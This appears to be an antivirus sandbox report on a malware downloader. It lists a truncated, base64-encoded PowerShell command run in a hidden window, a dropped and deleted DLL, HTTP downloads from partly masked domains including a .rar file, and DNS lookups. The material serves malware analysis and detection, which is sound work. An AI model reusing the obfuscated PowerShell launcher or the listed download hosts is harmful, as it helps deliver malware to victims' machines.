Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAFQALQBpAFQAZQBNACAAIAAoACcAdgAnACsAJwBhACcAKwAnAFIASQBBAEIATABFADoAdwBBACcAKwAnAFUAZABFAHEAJwApACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADAAfQ...
Modifies file system
Creates the following files
- %HOMEPATH%\n9s0f09\e2xz9na\pfriugif.dll
Deletes the following files
- %HOMEPATH%\n9s0f09\e2xz9na\pfriugif.dll
Network activity
TCP
HTTP GET requests
- http://gr###sindia.com/ve5estsq7
- http://www.gr###sindia.com/ve5estsq7
- http://ar##wbo.com/bwy4yoolw.rar
UDP
- DNS ASK m2.####onlinefx31.com
- DNS ASK gr###sindia.com
- DNS ASK ar##wbo.com
- DNS ASK ma##.#####fujitsuklimaservisi.com
- DNS ASK ma###oo3i.bh
- DNS ASK cr##.##tosaxplayer.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAFQALQBpAFQAZQBNACAAIAAoACcAdgAnACsAJwBhACcAKwAnAFIASQBBAEIATABFADoAdwBBACcAKwAnAFUAZABFAHEAJwApACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADQAfQB7ADEAfQB7ADAAfQ...' (with hidden window)
